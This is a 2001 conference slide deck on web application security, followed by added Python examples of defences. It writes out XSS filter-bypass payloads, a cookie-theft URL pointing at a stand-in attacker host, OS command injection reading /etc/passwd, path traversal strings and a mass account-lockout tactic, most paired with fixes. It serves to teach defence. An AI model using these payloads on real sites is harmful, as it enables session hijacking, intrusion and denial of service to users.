
BlackHat Amsterdam 2001

Web Application Security


The Land that Information Security Forgot.

Presenter: Jeremiah Grossman

Copyright 2001 WhiteHat Security All Rights Reserved
Topics

Web Application Security Landscape

Common Web Application Security Mistakes

Web Application Attack Methodologies

2001 © WhiteHat
Topics

Web Application Attack Methodologies

Information & Discovery
Input Manipulation & Parameter Tampering
Cross-Site Scripting
System Mis-Configuration

But Why!?

Easiest way to compromise hosts, networks and users.

Widely deployed.

No Logs! (the POST request payload is not logged)

Incredibly hard to defend against or detect.

Most don’t think of locking down web applications.

Intrusion Detection is a joke.

Firewall? What firewall? I don’t see no any firewall.

Encrypted transport layer does nothing.

Best of all, no one is looking anyway.

How much easier can it get!?
Oh right. Unicode.

Web Application
The Simple Definition

A web application or web service is a software application that is accessible using a web browser or HTTP(s) user agent.

Web Security Layers

The Implementation

E-Commerce        Entertainment
Shopping          Message Boards
Auctions          WebMail
Banking           Guest Books
Stock Trading     Voting Polls

Just Plain Crazy

Printers
PDA’s
Cell Phones
System Configuration
.NET/Passport

Firewall

Common Web Application Security Mistakes

Trusting Client-Side Data

DO NOT TRUST CLIENT-SIDE DATA!

Trusting client-side data is the #1 cause of vulnerabilities.

Identify all input parameters that trust client-side data.

Trusting Client-Side Data

The Level of Trust

E-Commerce Shopping

Numbers
<input type=hidden value=2149.37>    2149.00

Too much for a new VAIO!

<input type=hidden value=2.99>    2.99

Now On Sale!
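The hidden-price slide above, as an added example that is not part of the original deck: a checkout handler that trusts the hidden field next to one that only lets the client choose the product and quantity. The catalogue, product ids and request dictionaries are constructed for illustration.

```python
# Added example (not from the original deck): vulnerable vs. hardened checkout.
from decimal import Decimal

# Server-side catalogue: the only source of truth for prices (constructed sample data).
CATALOGUE = {"vaio-laptop": Decimal("2149.37"), "usb-cable": Decimal("2.99")}


def total_trusting_client(form: dict) -> Decimal:
    """Vulnerable: charges whatever price the browser sent in the hidden field.

    A user who edits <input type=hidden value=2149.37> to value=2.99 pays 2.99.
    """
    return Decimal(form["price"]) * int(form["qty"])


def total_server_side(form: dict) -> Decimal:
    """Hardened: the client may choose WHICH product and HOW MANY, never the price.

    Only the product id and quantity are read from the form; the price comes
    from the catalogue, and unknown ids or out-of-range quantities are rejected.
    """
    sku = form.get("sku", "")
    if sku not in CATALOGUE:
        raise ValueError("unknown product")
    try:
        qty = int(form.get("qty", "0"))
    except ValueError:
        raise ValueError("quantity is not an integer")
    if not 1 <= qty <= 99:
        raise ValueError("quantity out of range")
    return CATALOGUE[sku] * qty


# A tampered request (constructed): the hidden price now says 2.99 for the laptop.
TAMPERED = {"sku": "vaio-laptop", "price": "2.99", "qty": "1"}

if __name__ == "__main__":
    print("client-trusting total:", total_trusting_client(TAMPERED))  # 2.99
    print("server-side total:   ", total_server_side(TAMPERED))       # 2149.37
```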
Trusting Client-Side Data

The Level of Trust

Searches/Queries/Templates

Path
http://foo.com/cgi?val=string&file=/html/name.db

Or better yet…

http://www.foo.com/cgi?string=root&file=../../../../../etc/passwd

Unescaped Special Characters

! @ $ % ^ & * ( ) - _ + ` ~ \ | [ ] { } ; : ' " ? / , . > <

Check for:
Unescaped special characters within input strings

HTML Character Filtering
Proper handling of special characters

> => &gt;
< => &lt;
" => &quot;
& => &amp;

Null characters (%00) should all be removed.

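The two slides above (the special-character check and the HTML character filtering), as one added example that is not from the original deck: a CGI parameter is URL-decoded, stripped of null bytes, and HTML-encoded in the order the entities require, plus a helper that reports which of the listed special characters an input still carries.

```python
# Added example (not from the original deck): the slide's character handling,
# applied to a query-string value before it is echoed back into a page.
from urllib.parse import unquote

# The special characters the "Unescaped Special Characters" slide lists.
SPECIALS = set("!@$%^&*()-_+`~\\|[]{};:'\"?/,.><")


def html_encode(text: str) -> str:
    """Escape the four characters from the slide. '&' goes first so the
    entities produced for the other three are not themselves re-escaped."""
    return (text.replace("&", "&amp;")
                .replace("<", "&lt;")
                .replace(">", "&gt;")
                .replace('"', "&quot;"))


def clean_param(raw: str) -> str:
    """Decode a raw query-string value, drop null bytes (%00 included, since the
    value is decoded first), then HTML-encode it."""
    decoded = unquote(raw)
    no_nulls = decoded.replace("\x00", "")
    return html_encode(no_nulls)


def unescaped_specials(text: str) -> list:
    """Report which of the slide's special characters appear in the input, so a
    reviewer can see what an input filter let through."""
    return sorted(c for c in set(text) if c in SPECIALS)


if __name__ == "__main__":
    # The deck's script-tag string, as it would arrive in a URL.
    print(clean_param("%3CSCRIPT%3Ealert('JavaScript%20Executed');%3C/SCRIPT%3E"))
    print(clean_param("file%00.html"))
    print(unescaped_specials("abc<>;"))
```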
More mistakes…

SUID (Does a web application really need root?)

Authentication mechanisms using technologies such as JavaScript or ActiveX.

Lack of re-authenticating the user before issuing new passwords or performing critical tasks.

Hosting of uncontrolled data on a protected domain.

Information & Discovery

Spidering/Site Crawling
Identifiable Characteristics
Errors and Response Codes
File/Application Enumeration
Network Reconnaissance

Spidering/Site Crawling

Site Map          Hidden Services
Service Map       CGI's and Forms
Documentation     Email addresses

Tools: WGET
http://www.gnu.org/software/wget/wget.html

Identifiable Characteristics

Comment Lines
URL Extensions
Meta Tags
Cookies
Client-Side scripting languages

Enormous wealth of information about process flows, debug commands, system types and configurations.

Error and Response Codes

HTTP Response Headers
Server: IBM/Apache 1.3.19
Cookie Characteristics

Error Messages
Exception Messages (Java / SQL)
404 Error Pages
Failed Login
Locked Account
Database or file non-existent

File/Application Enumeration

Commonly referred to as “forced browsing” or “CGI Scanning”.

Directory Browsing / Index Listings

http://www.foo.com/dir3/dir2/dir1/file.html
Try:
http://www.foo.com/dir3/dir2/dir1/
http://www.foo.com/dir3/dir2/
http://www.foo.com/dir3/
Tools: Whisker
http://www.wiretrip.net/

File/Application Enumeration

Sample Files
Template Directories
Temp or Backup files
Hidden Files
Vulnerable CGIs

Network Reconnaissance

WHOIS
ARIN
http://www.arin.net/whois/index.html
Port Scan (Nmap)
http://www.insecure.org/nmap/index.html
Traceroute
Ping Scan (Nmap or HPING)
http://www.hping.org/
NSLookup / Reverse DNS
DNS Zone Transfer (DIG)
OS Fingerprinting (Nmap or Xprobe)

Input Manipulation / Parameter Tampering
"Twiddling Bits."

Cross-Site Scripting
Filter-Bypass Manipulation
OS Commands
Meta Characters
Path/Directory Traversal
Hidden Form Field Manipulation
HTTP Headers

Cross-Site Scripting
Bad name given to a dangerous security issue

Attack targets the user of the system rather than the system itself.

Outside client-side languages executing within the user's web environment with the same level of privilege as the hosted site.

Client-Side Scripting Languages

DHTML (HTML, XHTML, HTML x.0)    Opens all the doors.
JavaScript (1.x)                 Browser/DOM Manipulation
Java (Applets)                   Malicious Applets
VBScript                         Browser/DOM Manipulation
Flash                            Dangerous Third-Party Interactivity
ActiveX                          Let me count the ways…
XML/XSL                          Another Door Opener
CSS                              Browser/DOM Manipulation

Accessing the DOM & Outside the DOM

Document Object Model (DOM)

Client-side languages possess an enormous amount of power to access and manipulate the DOM within a browser.

Complex & diverse interconnections create an increased level of access within the DOM.

Increased level of access to read & modify DOM data, ranging from background colors, to a file on your system, and beyond to executing system calls.

Authentication/Authorization
“Hand in the cookie jar.”

Cookies are restricted to domains (.acme.com)

Uncontrolled data on a restricted domain can access the cookie data.

JavaScript Expression: "document.cookie"

window.open
document.img.src
Hidden Form Submit

www.attacker.com/cgi-bin/cookie_thieft.pl?COOKIEDATA

Cookie data is passed to a CGI through a GET request to an off-domain host.

The Scenarios

Trick a user to re-login to a spoofed page

Compromise authentication credentials

Load dangerous or malicious ActiveX

Re-direct a user or ALL users

Crash the machine or the browser

CSS Danger
“The Remote Launch Pad.”

Successfully CSS a user via a protected domain.

Utilizing a client-side utility (JavaScript, ActiveX, VBScript, etc.), exploit a browser hole to download a trojan/virus.

User is unknowingly infected/compromised within a single HTTP page load.

Dangerous HTML
“HTML Bad”

<APPLET>     Malicious Java Applications
<BODY>       Altering HTML Page Characteristics
<EMBED>      Embedding Third-Party Applications (Flash, etc.)
<FRAME>      Directly calling in other uncontrolled HTML
<FRAMESET>   Directly calling in other uncontrolled HTML
<HTML>       Altering HTML Page Characteristics
<IFRAME>     Directly calling in other uncontrolled HTML
<IMG>        SRCing Protocol attacks and other abuses
<LAYER>      Directly calling in other uncontrolled HTML
<ILAYER>     Directly calling in other uncontrolled HTML
<META>       META Refreshes (Client-Redirects)
<OBJECT>     ActiveX (Nuff Said)
<SCRIPT>     JavaScript/VBScript Loading
<STYLE>      Style Sheet and Scripting Alterations

Dangerous Attributes
“Attributes Bad”

ATTRIBUTE DANGER LIST
(Any HTML tag that has these attributes)

STYLE
SRC
HREF
TYPE

Filter Bypassing
"JavaScript is a Cockroach"

There are all kinds of input filters web applications implement to sanitize data.

This section will demonstrate many known ways input filters can be bypassed to perform malicious functions such as cross-site scripting, browser hijacking, cookie theft, and others.

Client-Side Scripting (CSS) attacks require the execution of either JavaScript, Java, VBScript, ActiveX, Flash and some others.

Testing the Filters

Submit all the raw HTML tags you can find, and then view the output results.

Combine HTML with tag attributes, such as SRC, STYLE, HREF and OnXXX (JavaScript Event Handler).

This will show what HTML is allowed, what the changes were, and possibly what dangerous HTML can be exploited.

SCRIPT TAG

Description: The script tag is the simplest form of inputting JavaScript.

Exploit:
<SCRIPT>alert('JavaScript Executed');</SCRIPT>

Solution: replace all "script" tags.

SRCing JavaScript Protocol
Description: The JavaScript protocol will execute the expression entered after the colon. Netscape tested.

Exploit: <IMG SRC="javascript:alert('JavaScript Executed');">

Solution: Replace "javascript" strings in all SRC & HREF attributes in HTML tags with another string.

Exp: <IMG SRC="java_script:alert('JavaScript Executed');">

will render this script useless.

Further Information:
Any HTML tag with a SRC attribute will execute this script on page load or on link activation.

As further protocol pattern matching, the keywords "livescript" and "mocha" must also be replaced, for they hold the same possibilities.

*** Netscape code names ***

SRCing JavaScript Protocol w/ HTML Entities

Description: As another derivative of the previous, decimal HTML entities within these strings can cause filter bypass.

Exploit:
<IMG SRC="javasc&#09;ript:alert('JavaScript Executed');">
Replacement of entities \10 - \11 - \12 - \13 will also succeed.

Hex instead of decimal HTML entities will also bypass input filters and execute.

<IMG SRC="javasc&#X0A;ript:alert('JavaScript Executed');">

As well as placing multiple ZEROs in front.

<IMG SRC=javasc&#000010;ript:alert('JavaScript Executed');>

Solution: Filter these entities within the string, then do your further pattern matching.

AND CURLY

Description:
Obscure Netscape JavaScript execution line. Exact syntax is needed to execute.

Exploit:
<IMG SRC="&{alert('JavaScript Executed')};">

Solution:
<IMG SRC="XXalert('JavaScript Executed')};">
or something similar will nullify the problem.

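The three SRC/HREF slides above (plain javascript: protocol, HTML-entity variants, and the Netscape "&{...}" form), plus the @import cases on the style-tag slide, as one added example that is not from the original deck. It does what the slides' "Solution" lines call for in the order they require: decode the numeric entities first, drop the control characters, and only then pattern-match the scheme against the deck's three keywords. Rejecting the value outright rather than rewriting it to "java_script" is this example's choice; the exploit strings from the slides are the inputs.

```python
# Added example (not from the original deck): server-side check for script-bearing
# SRC/HREF attribute values and STYLE bodies, built from the slides' bypass list.
import re

SCRIPT_SCHEMES = ("javascript", "livescript", "mocha")  # the deck's three keywords
# &#09;  &#X0A;  &#000010;  with or without the trailing semicolon
_ENTITY = re.compile(r"&#(x[0-9a-f]+|[0-9]+);?", re.IGNORECASE)
# Tab, LF, VT, FF, CR (entities 9-13 on the slide) and NUL
_CONTROL = re.compile(r"[\x09-\x0d\x00]")


def decode_numeric_entities(value: str) -> str:
    """Turn &#09; &#X0A; &#000010; etc. into the characters they stand for."""
    def repl(m):
        num = m.group(1)
        code = int(num[1:], 16) if num[0] in "xX" else int(num, 10)
        return chr(code) if code < 0x110000 else ""
    return _ENTITY.sub(repl, value)


def normalise(value: str) -> str:
    """Decode entities, drop control characters and surrounding blanks, lower-case.
    Pattern matching on the raw value would miss every variant on the slides."""
    return _CONTROL.sub("", decode_numeric_entities(value)).strip().lower()


def src_is_dangerous(value: str) -> bool:
    """True if a SRC/HREF value would run script in a 2001-era browser."""
    norm = normalise(value)
    scheme = norm.split(":", 1)[0] if ":" in norm else ""
    if scheme in SCRIPT_SCHEMES:
        return True
    return norm.startswith("&{")  # Netscape JavaScript entity ("AND CURLY")


def style_is_dangerous(body: str) -> bool:
    """True if a STYLE body imports external CSS or names a script scheme."""
    norm = normalise(body)
    return "@import" in norm or any(s + ":" in norm for s in SCRIPT_SCHEMES)


if __name__ == "__main__":
    for v in ("javasc&#09;ript:alert('JavaScript Executed');",
              "&{alert('JavaScript Executed')};",
              "http://www.foo.com/logo.gif"):
        print(repr(v), "->", src_is_dangerous(v))
```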
Style Tag Conversion
Description: Turn a style tag into a JavaScript expression.

Exploit:
<style TYPE="text/javascript">JS EXPRESSION</style>

Solution: Replace the "javascript" string with "java_script" and all should be fine.

Exploit: Import dangerous CSS.

<STYLE type=text/css>
@import url(http://server/very_bad.css);
</STYLE>

Solution: Filter and replace the "@import"

Exploit: Import a JavaScript expression through a style tag.

<style TYPE="text/css">
@import url(javascript:alert('JavaScript Executed'));    IE HOLE
</style>

Solution: Again, filter and replace the "@import" and the "javascript:" just to be safe.

Using CSS

Click to Execute
User must click on a link to execute the script.
(Search Fields, 404 Errors, etc.)
http://www.foo.com/NOFILE/<SCRIPT>alert('JavaScript Launched');</SCRIPT>

Mass Injection
All users viewing the page execute the script.
(Guest Books, Message Boards)

Post a JavaScript onto a board

Message <SCRIPT>alert('JavaScript Launched');</SCRIPT>

Using CSS
Directed Injection
As soon as the user loads the page, the script executes.
(WebMail, HTML Mail, Messaging)

Send an email with…

HELLO <SCRIPT>alert('JavaScript Launched');</SCRIPT>

Holding the door open
(FeedBack, Profile Pages, anything persistent…)

Load HTML page with sourced scripts.

<LAYER SRC="javascript.js"></LAYER>

Twiddling Bits

OS Commands
Meta Characters
Path/Directory Traversal

Power of the Semi-Colon
Piping input to the command line.

OS Commands
http://foo.com/app.cgi?email=none@foo.com

Append:
http://foo.com/app.cgi?email=none@foo.com;+sendmail+/etc/passwd

Piping:
http://foo.com/app.cgi?email=none@foo.com+|+less

Re-Direct:
http://foo.com/app.cgi?email=none@foo.com+>+/

Power of Special Characters
Piping input to the command line.

Meta Characters
http://foo.com/app.cgi?list=file.txt

Altered:
http://foo.com/app.cgi?list=*

Power of the Dots and Slashes
Piping input to the command line.

Path / Directory Traversal

http://foo.com/app.cgi?directory=/path/to/data

DotDot Slash:
http://foo.com/app.cgi?dir=path/to/data../../../../etc/passwd

Dot Slash:
http://foo.com/app.cgi?dir=path/to/data../../../../etc/././passwd

Double DotDot Slash:
http://foo.com/app.cgi?dir=path/to/data....//....//....//etc/passwd

More Filter Bypassing

Method Alteration (HEAD, PUT, POST, GET, etc.)

URL Encode
http://www.foo.com/cgi?value=%46%72%68%86

Null Characters
http://www.foo.com/cgi?value=file%00.html

More…
Alternate Case, Unicode, String Length, Multi-Slash, etc.

More bits…

Hidden Form Field Manipulation

HTTP Headers (Cookies, Referers…)

System Mis-Configurations
“patches, patches, and more patches…"

Vendor Patches
Default Accounts

Check:
Web Server permission by directory browsing
Software version from Discovery
Known default accounts in commercial platforms
BugTraq
Anonymous FTP open on Web Server

Other Dirty Tricks
“Abuse can be far more time consuming, costly and dangerous”

Mass Account Lockout

Attacks against brute force

3 Time Failure Lock-Out Rule

Purposely fail the 3 attempts against thousands of accounts. If the login is sequential, even better.

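The mass-account-lockout trick above from the defender's side, as an added example that is not from the original deck: detection logic run over constructed login-failure log lines. One source that pushes many different accounts to the three-failure threshold in one sweep is flagged; a user who mistypes a password twice is not. The log line format is invented for this example; adapt the parser to your own application's login log.

```python
# Added example (not from the original deck): flag sources that trip the
# "3 time failure lock-out rule" against many accounts at once.
import re
from collections import defaultdict

LOCKOUT_THRESHOLD = 3   # the 3-failure lock-out rule from the slide
MIN_ACCOUNTS = 10       # distinct accounts one source must lock before we alert
# Constructed log format: "<timestamp> LOGIN_FAIL user=<account> src=<ip>"
_LINE = re.compile(r"^(?P<ts>\S+) LOGIN_FAIL user=(?P<user>\S+) src=(?P<src>\S+)$")


def parse(lines):
    """Yield (timestamp, user, src) for each failed-login line; skip the rest."""
    for line in lines:
        m = _LINE.match(line.strip())
        if m:
            yield m.group("ts"), m.group("user"), m.group("src")


def mass_lockout_sources(lines, threshold=LOCKOUT_THRESHOLD, min_accounts=MIN_ACCOUNTS):
    """Return {src: sorted accounts that src pushed to the lock-out threshold}
    for every source that locked at least min_accounts distinct accounts."""
    failures = defaultdict(lambda: defaultdict(int))   # src -> user -> count
    for _ts, user, src in parse(lines):
        failures[src][user] += 1
    flagged = {}
    for src, per_user in failures.items():
        locked = sorted(u for u, n in per_user.items() if n >= threshold)
        if len(locked) >= min_accounts:
            flagged[src] = locked
    return flagged


# Constructed sample log: one source sweeps sequential account names
# (user0001, user0002, ...) three times each; another user just fails twice.
SAMPLE_LOG = [
    f"2001-11-21T10:00:{i % 60:02d} LOGIN_FAIL user=user{1 + i // 3:04d} src=10.0.0.5"
    for i in range(36)
] + [
    "2001-11-21T10:01:00 LOGIN_FAIL user=alice src=192.168.1.20",
    "2001-11-21T10:01:05 LOGIN_FAIL user=alice src=192.168.1.20",
]

if __name__ == "__main__":
    for src, accounts in mass_lockout_sources(SAMPLE_LOG).items():
        print(f"{src}: locked {len(accounts)} accounts ({accounts[0]} .. {accounts[-1]})")
```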
Other Dirty Tricks
“Abuse can be far more time consuming, costly and dangerous”

Brute Force/Page Sequencing

Attacks against process flow

Use 1 or 2 pieces of data to get the rest.

Slowly brute force the process for data aggregation.

Thank You
BlackHat and Attendees

Questions?

Jeremiah Grossman
jeremiah@whitehatsec.com

WhiteHat Security
All presentation updates will be available on
www.whitehatsec.com
